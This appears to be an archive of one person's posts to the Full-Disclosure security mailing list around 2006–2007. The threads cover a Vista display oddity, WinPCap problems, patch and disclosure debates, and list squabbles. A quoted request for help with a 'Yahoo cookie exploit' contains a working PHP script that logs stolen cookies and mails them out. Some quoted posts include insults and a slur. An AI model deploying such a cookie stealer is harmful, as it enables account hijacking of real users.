[Full-disclosure] Vista's been hacked

[Aaron Gray]

Some irritating person has changed the screen scaling on my Vista machine.

Aaron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista's been hacked

[Aaron Gray]

I was hoping that someone would know how the hack was done.

It was via IE7, I was not using any odd sites, only ps2pdf.com google and 
academic sites.

It must have altered the registery, "permanently" altering the screen 
scaling.

Anyone who can give me a tip on readjusting the screen scaling gets cookie 
points, as this would be very useful for a sight impaired friend of mine.

Hope this is is not excess traffic.

- Original Message - 
From: "dripping" <[EMAIL PROTECTED]>
To: 
Sent: Sunday, December 09, 2007 3:36 AM
Subject: Re: [Full-disclosure] Vista's been hacked


> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> thanks for the useless mail in my inbox!
>
> Aaron Gray wrote:
>> Some irritating person has changed the screen scaling on my Vista 
>> machine.
>>
>> Aaron
>>
>>
>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.7 (MingW32)
>
> iD8DBQFHW2LMKEUN5NDn7CURAj2CAJ9i7U82xKGMP2ko1SwTZIfuGOzP1QCgi+NO
> wpiTMFYl0+cpFqgYw+tGHsI=
> =2vWB
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/ 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista's been hacked

[Aaron Gray]

> http://msdn2.microsoft.com/en-us/library/aa965260.aspx
> Screen scaling/Accessibility.
>
> odd...I'll go to my vista machine and check out ps2pdf.com.
> Did this happen upon a reboot, or did it just do this today?

After some odd window behaviour just before downloading the pdf file which 
failed.
So it could well be ps2pdf.com but it might not have been the set of events 
was too confusing to tell.

Yes then after the four second turn off and restart the scaling took effect.

Thanks for the reply,

Aaron


>
> Aaron Gray wrote:
>> I was hoping that someone would know how the hack was done.
>>
>> It was via IE7, I was not using any odd sites, only ps2pdf.com google and
>> academic sites.
>>
>> It must have altered the registery, "permanently" altering the screen
>> scaling.
>>
>> Anyone who can give me a tip on readjusting the screen scaling gets 
>> cookie
>> points, as this would be very useful for a sight impaired friend of mine.
>>
>> Hope this is is not excess traffic.
>>
>> - Original Message - 
>> From: "dripping" <[EMAIL PROTECTED]>
>> To: 
>> Sent: Sunday, December 09, 2007 3:36 AM
>> Subject: Re: [Full-disclosure] Vista's been hacked
>>
>>
>> thanks for the useless mail in my inbox!
>>
>> Aaron Gray wrote:
>>>>> Some irritating person has changed the screen scaling on my Vista
>>>>> machine.
>>>>>
>>>>> Aaron
>>>>>
>>>>>
>>>>>
>>>>> 
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/ 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista's been hacked

[Aaron Gray]

> Oh wow.
> I didn't even read that page..
> Sorry, I'll do a bit more searching :)
>
> dripping wrote:
>> http://msdn2.microsoft.com/en-us/library/aa965260.aspx
>> Screen scaling/Accessibility.

That may well be it as it was not universal and did not effect Zeus Editors 
text size but does effect all menus. Also I think the menu item font maybe 
diferent.

>> odd...I'll go to my vista machine and check out ps2pdf.com.

Was that okay ?

>> Did this happen upon a reboot, or did it just do this today?
>>
>>
>> Aaron Gray wrote:
>>> I was hoping that someone would know how the hack was done.
>>>
>>> It was via IE7, I was not using any odd sites, only ps2pdf.com google 
>>> and
>>> academic sites.
>>>
>>> It must have altered the registery, "permanently" altering the screen
>>> scaling.
>>>
>>> Anyone who can give me a tip on readjusting the screen scaling gets 
>>> cookie
>>> points, as this would be very useful for a sight impaired friend of 
>>> mine.
>>>
>>> Hope this is is not excess traffic.
>>>
>>> - Original Message - 
>>> From: "dripping" <[EMAIL PROTECTED]>
>>> To: 
>>> Sent: Sunday, December 09, 2007 3:36 AM
>>> Subject: Re: [Full-disclosure] Vista's been hacked
>>>
>>>
>>> thanks for the useless mail in my inbox!
>>>
>>> Aaron Gray wrote:
>>>>>> Some irritating person has changed the screen scaling on my Vista
>>>>>> machine.
>>>>>>
>>>>>> Aaron
>>>>>>
>>>>>>
>>>>>>
>>>>>> 
>>>>>>
>>>>>> ___
>>>>>> Full-Disclosure - We believe in it.
>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/ 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista's been hacked

[Aaron Gray]

>I can't seem to replicate this issue at all.
> :|

Oh well, its a good thing really ps2pdf.com okay and not good to have the 
same issue too.


>>> dripping wrote:
 http://msdn2.microsoft.com/en-us/library/aa965260.aspx
 Screen scaling/Accessibility.

Yeah, that was no good.

>> That may well be it as it was not universal and did not effect Zeus
>> Editors text size but does effect all menus. Also I think the menu item
>> font maybe diferent.
>>

Cannot find an interface that controls "scaling".

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Money talks bullshit walks

[Aaron Gray]

Why 'o' Why do the big companies not reward 
hackers/crackers with monitary rewards for vulnerabilities and/or exploits for 
then and there non disclosure ?
 
My $0.02 cents worth.
 
Aaron
 
 
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WinPCap

[Aaron Gray]

Hi,
 
Does anyone know why WinPCap has stopped working 
after MS post SP2 updates ?
 
Why, how, can it be fixed ?
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WinPCap

[Aaron Gray]

Does anyone know why WinPCap has stopped working after MS post SP2 
updates ?


If I were a betting man, I would guess that it hadn't... You'd
think this'd be the kind of thing they'd get onto fairly fast.


I've tried it on two machines both after fresh install and updates.


Why, how, can it be fixed ?


You're probably best off addressing this 'un to the
winpcap-users mailing list. Please see
"http://www.winpcap.org/contact.htm"; for more information.


Thanks I will do that.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WinPCap

[Aaron Gray]

I have just done a reinstall of WinPCap 3.1 and it is working now with 
Analyser.


Strange I tried it before on two machines and with Analyser and Ethereal.

Oh well, all working fine now,

Aaron

- Original Message - 
From: "Lyal Collins" <[EMAIL PROTECTED]>

To: "'Aaron Gray'" <[EMAIL PROTECTED]>
Sent: Tuesday, March 28, 2006 9:03 AM
Subject: RE: [Full-disclosure] WinPCap



Are you using version 3.1?
Winpcap Versions between 2.3 and the release version of 3.1 didn't work 
for

me either.
Lyal

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Aaron Gray
Sent: Tuesday, 28 March 2006 3:14 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] WinPCap




Does anyone know why WinPCap has stopped working after MS post SP2
updates ?


If I were a betting man, I would guess that it hadn't... You'd think
this'd be the kind of thing they'd get onto fairly fast.


I've tried it on two machines both after fresh install and updates.


Why, how, can it be fixed ?


You're probably best off addressing this 'un to the winpcap-users
mailing list. Please see "http://www.winpcap.org/contact.htm"; for more
information.


Thanks I will do that.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.375 / Virus Database: 268.2.6/288 - Release Date: 22/03/2006




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Third party patches, a matter of trust by n3td3v

[Aaron Gray]

They do not necessarily work right. A JPEG patch 
fixed the volunerability but after a MS update a week later stopped any viewing 
of JPEG's and the only way I could find to get the system back to normal was an 
OS reinstall.
Aaron
 

  - Original Message - 
  From: 
  n3td3v 
  To: full-disclosure@lists.grok.org.uk 
  
  Sent: Wednesday, March 29, 2006 8:39 
  PM
  Subject: [Full-disclosure] Third party 
  patches, a matter of trust by n3td3v
  
  Third party patches, a matter of trust by n3td3v
  Why are third party patches a bad thing?
  They force Microsoft to rush out a patch before Q.A testing has been 
  fully completed in the time scaleMicrosoft would have initially hoped.
  Is it responsible for eEye to release a third party patch before 
  Microsoft?
  No, its very bad because it confuses the consumer and brings up the issue 
  of trustin the mind of the consumer. Once you start dangling multiple 
  vulnerability fixes infront of consumer, it opens the door for malicious 
  hackers, script kids and phishers to compromise security.
  What do you mean "irresponsible"?
  Yes, because the delivery of a third party patch cannot reach a world wide 
  audience if the news of third party patch avaiability is only on that of 
  U-S based news media outlets.
  Microsoft since service pack two have automatic update functionality on its 
  software, allowing a patch to be delivered essentially to all of its 
  customers world wide, eEye just don't have that kind of reach available to 
  them. 
  How could a third party patch be used against people?
  Script kids compromise systems, and then patch them with the third party 
  patch.
  If the trend of third party patches continue, malicious users can play upto 
  the multiple patch sources available, and setup fraud scams to compromise a 
  user system with bogus patches, which have inserted malicious code. A lot of 
  the time the malicious code will have additional vulnerabilities attached. The 
  third party patch merely acts as a deliver system to socially engineer the 
  mind of the consumer. Once the consumer gets the idea of patches being 
  available from multiple sources, then thats where the problems will spiral out 
  of control, and that element of trust really comes into play. 
  Should Microsoft take legal action against third party patch developers 
  like eEye?
  Yes, I think so. The idea of thrid party patches being released by big 
  companies like eEye is very irresponsible and offers a grave danger to the 
  public at large, by making the patch available to the worlds malicious users, 
  where then, the magnitude of the situation is blown up and makes the situation 
  more intense because fixes are being made available for 0-day before Microsoft 
  has had the chance to fully develop a secure realible patch and deliver it to 
  world wide customers. 
  Should Micorsoft release a patch for critical public 0-day before patch 
  tuesday?
  Yes, and no. No, If it wasn't for eEye compromising security by forcing 
  Microsoft to push out a patch before the required time frame, then there 
  would be no need to release a patch early. Yes, because since the WMF flaw, 
  third party developers are releasing patches and Microsoft must get ontop of 
  the trend before consumers start to trust third party sources in place of the 
  legitimate Micrsoft patch. 
  What can consumers do to protect themselves from third party patches?
  Never download a third party patch, even if its from a "trusted" source. 
  Real patches will only ever come from Microsoft and the Automatic Update 
  functionaility on Microsoft products. Remember, Microsoft can offer you 
  support if their patch becomes faulty. If you download from a third party 
  source, your system may become corrupt with errors, or in the worst case 
  scenario, you may be victim to a malicious patch claming to fix a 
  vulnerability. 
  Should the industry get behind the idea of making third party patches an 
  unacceptable alternative to a Microsoft patch?
  Yes. The future of security world wide depends on the industry not 
  recommending these patches, no matter how safe the patch may appear or if the 
  source can be trusted. The only real patch can be offered by Microsoft, and 
  the only people who really do know how to fix a vulnerability is Microsoft. 
  With the WMF flaw, many folks were shocked to see SANS etc recommending a 
  third party patch. This time around it seems to be different. The big players 
  are finally listening to folks like n3td3v and the grave dangers attached to 
  making the trend of third party patches for Microsoft products a bad pratice, 
  whcih shouldnt be encouraged under any circumstance. Sure, its healthy to 
  develop your own patch solutions in private for your own research and 
  development, but as soon as you offer that patch to the wild, then its surely 
  going to be picked up by malicious users and used against the consumer ten 
  times over

Re: [Full-disclosure] Help me with Yahoo cookie exploit

[Aaron Gray]

Justin,
 
If you don't know how to use them either learn 
_javascript_ and PHP or give up.
 
Aaron
 

  - Original Message - 
  From: 
  iustin 
  Darloman 
  To: full-disclosure@lists.grok.org.uk 
  
  Sent: Monday, April 17, 2006 6:48 
PM
  Subject: [Full-disclosure] Help me with 
  Yahoo cookie exploit
  
  
Hello my name is Justin and i want to ask you if there is a program 
that exploits cookies on yahoo ...i can't understand what those mean... and 
i can't use the vulnerability...please help me 
 
i found this script 
 


and this php file 
 
$file="cookie.log";if (isset($_REQUEST["cookie"]) 
&& isset($_REQUEST["id"])){$logcookie = 
$_REQUEST["cookie"];$logcookie = rawurldecode($logcookie);$logemail 
= $_REQUEST["id"];$logemail = rawurldecode($logemail);if 
(file_exists($file)) {$handle=fopen($file, 
"r+");$filecontence=fread($handle,filesize("$file"));fclose($handle);}$handle=fopen($file, 
"w");fwrite($handle, "$logemail - $logcookie\n $filecontence\n 
");//Writing email address and cookie then the rest of the 
logfclose($handle);mail("email", "$logemail", 
"$logemail\n$logcookie\n$filecontence\n");}header("Location: http://mail.yahoo.com");?>
but i don't know how to use them :(...please help me...
WIth respect, Justin!
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
  
  

  No virus found in this incoming message.Checked by AVG Free 
  Edition.Version: 7.1.375 / Virus Database: 268.4.1/312 - Release Date: 
  14/04/2006
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

[Aaron Gray]

Kill Secunia, the illegal high jackers of FD.


Yes they release real vulnerablities.

See "Internet_Explorer_Address_Bar_Spoofing_Vulnerability_Test":-

   http://secunia.com/advisories/19521/

Will disabling or removing Flash till its solved prevent this ?

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

[Aaron Gray]

>Kill Secunia, the illegal high jackers of FD.

Yes they release real vulnerablities.

See "Internet_Explorer_Address_Bar_Spoofing_Vulnerability_Test":-

   http://secunia.com/advisories/19521/

Will disabling or removing Flash till its solved prevent this ?


Installing Google Toolbar and enabling Popup Blocker catches this.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

[Aaron Gray]

So releasing one vulnerability... and not even a remote system 
one... makes them legitimate?  They are just as bad as that n3td3v 
faggot.


I see everyone gets on well here :)

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

[Aaron Gray]

My $0.02, ignore as you see fit.

As a consumer, I prefer (arguably have the right) to know at the earliest
possible opportunity whether a product I am using is flawed.  Whether a
medication appears to cause cancer, my car is prone to exploding when rear
ended, or a piece of software is found to be exploitable.  I don't wish to
wait through some potentially lengthy process, legal or otherwise, in 
which

the producer of the product denies or downplays the severity of the flaw
before finally addressing the problem and making the flaw public before I
hear about it for the first time.  To pretend that you are somehow immune 
to

the problem while the vendor fails to disclose it is simply ridiculous.

While vendor coordination is certainly nice to have, the ONLY thing I 
would

like to see required in pre-patch disclosures are constructive ways to
mitigate the problem, and the impact of those mitigations.

For those that would not disclose, what gives you the right to judge 
whether

someone is capable of dealing or not dealing with the newly announced
vulnerability, and what makes you think that you are qualified to manage 
the
risk on my networks?  If you are an information security professional, 
then
you are paid to deal with "problem", if you are not capable of dealing 
with

it, then you need to rethink your profession.

Flame away,


The only thing that I would add that ehat in an idea world firstly on 
finding a vulnerability that an advisory is made to the product producer 
then secondly to the list with an IDS fingerprint SNORT. Then not until a 
reasonable time to fix the vulnerability the proof of concept exploit is 
released (This gives time to hone the exploit as well :)


My 0.02 cents added,

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

[Aaron Gray]

The only thing that I would add that ehat in an idea world firstly on
finding a vulnerability that an advisory is made to the product producer
then secondly to the list with an IDS fingerprint SNORT. Then not until a
reasonable time to fix the vulnerability the proof of concept exploit is
released (This gives time to hone the exploit as well :)


Sometimes (often, in fact) it's really hard to write a good SNORT signature
that can't be reverse-engineered to give up enough info to create a PoC


Maybe signatures should be able to be MD5'ed.

Aaron


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

[Aaron Gray]

The only thing that I would add that ehat in an idea world firstly on
finding a vulnerability that an advisory is made to the product producer
then secondly to the list with an IDS fingerprint SNORT. Then not until 
a

reasonable time to fix the vulnerability the proof of concept exploit is
released (This gives time to hone the exploit as well :)


Sometimes (often, in fact) it's really hard to write a good SNORT 
signature
that can't be reverse-engineered to give up enough info to create a 
PoC


Maybe signatures should be able to be MD5'ed.


mmm, on second thoughts maybe it would be too processor intensive.

It may work on a window though ?

Don't know, I'll leave it to the experts :)

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo Messenger Source Code Released: Chat WindowCode

[Aaron Gray]

Your an utter moron...

- Original Message - 
From: "n3td3v" <[EMAIL PROTECTED]>

To: 
Sent: Sunday, April 30, 2006 12:37 AM
Subject: [Full-disclosure] Yahoo Messenger Source Code Released: Chat 
WindowCode



=$MsgsPerRegion){ $DestroyMessages(($Region+1)%$MaxRegions, "region");
$Region=($Region+1)%$MaxRegions; $MsgCount=0; } if (ignored) t=''; var
i=insertpoint; var b=imbody; if(i)
i.insertAdjacentHTML("BeforeBegin",t); else if(b)
b.insertAdjacentHTML("BeforeEnd",t); } function $Append(name, text,
datestamp, timestamp, mode, ignored, dispname) { if(dispname == "")
dispname = name; var classname; switch (mode) { case TT_SENT:
classname = "sendername"; break; case TT_RCVD: classname =
"recvername"; break; case TT_YMSGR: classname = "ymsgrname"; break;
case TT_CHAT_MSG_SENT: classname = "chatsender"; break; case
TT_CHAT_MSG_RCVD: classname = "chatrecver"; break; case
TT_CHAT_IGNORE: case TT_CHAT_JOIN_LEAVE: case TT_CHAT_ACT_SENT: case
TT_CHAT_ACT_RCVD: return
$AppendChatAction(name,text,mode,ignored,dispname); case
TT_ACTION_MSG_RED: case TT_ACTION_MSG_GREEN: case TT_STATUS_CHANGE:
case TT_STATUS_CHANGE_IMUNIFIED: return $AppendStatus(text,mode); case
TT_TEXT: return $AppendOther(text); case TT_CHAT_JOIN_HEADER: return
$AppendOther("

" + text + "

"); default: return alert("Undefined Text Type: " + mode); }
$bAutoScroll=$UpdateAutoScroll(); var t="
0) t+=timestamp+")"; if (mode==TT_YMSGR) t+=": "; else t+=": "; t+=""+text+"

"; Insert(t,name,ignored); $Scroll(); } function
$AppendChatAction(name,text,mode,ignored,displayname){ var classname;
var classtext="chataction"; var dispname=displayname;
if(mode==TT_CHAT_ACT_SENT) classname="chatsender"; else
if(mode==TT_CHAT_ACT_RCVD) classname="chatrecver"; else{
if(mode==TT_CHAT_IGNORE){ dispname="*** "+dispname; ignored=false; }
classname="chatusername"; classtext="usertext"; }
$bAutoScroll=$UpdateAutoScroll(); var t="
"+dispname; t+=" "+text+"

"; Insert(t,name,ignored); $Scroll(); } function $AppendStatus(t,m){
if (document.all.ystatus) ystatus.outerHTML = ""; var
classname="graystatus"; if (m==TT_ACTION_MSG_GREEN)
classname="greenstatus"; else if(m==TT_ACTION_MSG_RED)
classname="redstatus"; $bAutoScroll=$UpdateAutoScroll(); Insert("
"+t+"

"); $Scroll(); } function $AppendOther(t){
$bAutoScroll=$UpdateAutoScroll(); Insert("
"+t+"

"); $Scroll(); } function $Clear(){ imbody.innerHTML="



=0;i--){ var attribute=Msgs[i].getAttribute(a,0); if(attribute==n){
var s=Msgs[i].outerHTML; s='=0;i--){ var
attribute=Msgs[i].getAttribute(a,0); if(attribute==n) { var
s=unescape(Msgs[i].getAttribute("data"));
Msgs[i].insertAdjacentHTML('afterEnd',s); Msgs[i].outerHTML=""; } } }
$Scroll(); } function $Copy(){ var
t=document.selection.createRange().text; if (t!="") $InvokeCmd(10,t);
} function $BackgroundImage(image,url,valign,halign,repeat,color){ if(
image == "" ) { imbody.style.background = ""; return; } if( valign ==
"" ) valign = "center"; if( halign == "" ) halign = "center";
imbody.style.backgroundPosition = valign+" "+halign;
imbody.style.backgroundImage = "url("+image+")"; if( repeat == "" )
repeat = "no-repeat"; imbody.style.backgroundRepeat = repeat;
imbody.style.backgroundAttachment = "fixed"; if( color == "" ) color =
"#ff"; imbody.style.backgroundColor = color; } function
$InvokeCmd(a,b){ window.external.InvokeCommand(a,b); } function
urlClick(that) { } function urlUp(that) { }

You are in "Security news:1"; ( http://groups-beta.google.com/group/n3td3v )



n3td3v (14/06/05 01:53:42): Hello World



document.body.onresize=$HandleResize; RestoreStyles();

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.375 / Virus Database: 268.5.1/327 - Release Date: 28/04/2006


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo Messenger Source Code Released: ChatWindowCode

[Aaron Gray]

On 4/30/06, Aaron Gray <[EMAIL PROTECTED]> wrote:

Your an utter moron...


tROLL!


No I am not trolling. The code you "released" is not a release. It is badly 
done cut 'n' paste job. Any way releases are done by the authoring company 
not a 'n3td3v' claiming to be releasing Yahoo code.


You can get neat source easily if you are on Windows, from Temporary 
Internet Files.


Sorry but I am inclined to agree with the others now.
You did not do your homework on the code properly.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo Messenger Source Code Released:ChatWindowCode

[Aaron Gray]

On 4/30/06, Aaron Gray <[EMAIL PROTECTED]> wrote:

It is badly done cut 'n' paste job.


You mean copy and paste, right?


Yep


not a 'n3td3v' claiming to be releasing Yahoo code.


I'm not claiming, i've done it.


Its not a release though !


You can get neat source easily if you are on Windows, from Temporary
Internet Files.


I never got any of this from a temporary internet folder.


Thats what I am saying you could get full .js or .html files from there.
And done a proper "release" not a rag tailed mess.


Sorry but I am inclined to agree with the others now.
You did not do your homework on the code properly.


Do you know what produce.yahoo.com is?


No please educate me.

Aaron


Regards,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.375 / Virus Database: 268.5.1/327 - Release Date: 28/04/2006

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo Messenger Source Code Released:ChatWindowCode

[Aaron Gray]

http://groups.google.com/group/n3td3v/browse_thread/thread/b49f1f8cea9cb8ea/789af08498ac64e4#789af08498ac64e4


BTW byou left the :-

   Hosted and sponsored by Secunia - http://secunia.com/

"SPAM" on the end of your n3td3v posting !

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo Messenger Source CodeReleased:ChatWindowCode

[Aaron Gray]

I know, I blame John Cartwright. :)
If I could strip it so it didn't spam my members, I would remove it.
I'll need to talk to Google about it. They already stripped the
[Full-Disclsoure] tag out of the subject header, so maybe they'll
strip the footer spam as well.


You really are a moron.

Aaron


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo Messenger Source CodeReleased:ChatWindowCode

[Aaron Gray]

On 4/30/06, Aaron Gray <[EMAIL PROTECTED]> wrote:

Its not a release though !


I've had it since June '05 and is now released to the public to
exploit for some instant messenger worm / virus.


Well title the posting correctly !

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Full Disclosure "Code of conduct"

[Aaron Gray]

I am suggesting that we all cooperate and produce a "Code 
of Conduct" for participating on the Full Disclosure mailing list.
 
Suggested start :-
 
    1) No Swearing
    2) No slagging others off
    3) No selling of exploits and 
vulnerabilities
 
Regards,
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Full Disclosure "Code of conduct"

[Aaron Gray]

ahahahahaha... jesus fucking christ on a cross you are truly a dumb 
cunt.  Guess I just fucked your other two rules didn't I.


Thought that you would post something of that nature.

Your truely predictable, whats the point ?


No selling of exploits and vulnerabilities?


This list is called FULL DISCLOSURE for a reason !

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Full Disclosure "Code of conduct"

[Aaron Gray]

You would have to agree that Full Disclosure is a rather different (if
not alternate) mailing list. So one of the things i would do would be
using your favourite email client filters to reduce the noise and make
sure you won't read from specific people anymore, i've done so :)


What do you do about the replies to that persons posts from others ?

Do you filter them as well ?

Regards,

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DNS mining ?

[Aaron Gray]

> There are numerous tools out there that will take IP addresses and report
> back [all] the domains on them.  The best one I came across some time
> about was the Reverse IP search from www.domaintools.com.  Unfortunately
> to get the entire list you have to pay now -- I think.  You used to just
> be able to register for a free account that would let you do 5 searches a
> day and show you all the domains.  So if one IP had 3000 domains on it, it
> would let you go through all of them, and that was one search.  Now you
> can just see a small selection.

Is there not a tool that runs on *nux that does this ?

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Spam is funny!

[Aaron Gray]

> Shaun wrote:
> 
>> One trend I've noticed recently is that spammers appear to be tailoring
>> the subject headers to individual recipients. I'm not talking about the
>> crap where they stick your name in the subject, it seems they're getting
>> much more specific, and perhaps tracking where they picked up an email
>> address to begin with and which sort of subject lines might pique the
>> recipient's interest. 
>> 
>> I receive a lot of spam where I glance at the subject - even if SA has
>> tagged it - and actually have to wonder whether or not it's a legit
>> message, because the subject is relevant to my interests. A quick
>> example,
>> 
>> Subject: The Redirect requests to SSL port option allows you to redirect
>> requests to the specified SSL port.
>> 
>> I do a lot with SSL, so naturally I opened up that email just to see
>> what the heck they're on about. Of course it turns out to be a stock
>> spam for CYTV. But I get a lot of spam now with unix-ish, programming,
>> or other geek related subject lines that I have to take a look at
>> because they _could_ be legit. 
> 
> I've seen a lot of spam lately (last 6-8 weeks -- maybe more) using, as 
> their "Subject" lines similar such "sentences" from online copies of 
> (mostly) Linux-ish books and "how to" articles (and often as the hash-
> buster text in the message body).  This may be loosely targeted -- we 
> quite possibly subscribe (and post?) to several similar mailing lists 
> and the use of our addresses _in this particular spam_ may be from 
> harvesting such lists or their web archives -- or it may be that some 
> spammer thinks (or knows from monitoring his RoI) that such "techno-
> speak goobledegook" Subject: lines work better (non-tech folk _may_ 
> have been conditioned by much poorly-considered "tech support" to "dumb 
> down" when anyone starts "talking techie" at them...).

Whats the point we still chuck it away.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Spoofing via Google

[Aaron Gray]

An example of spoof redirection via Google :-

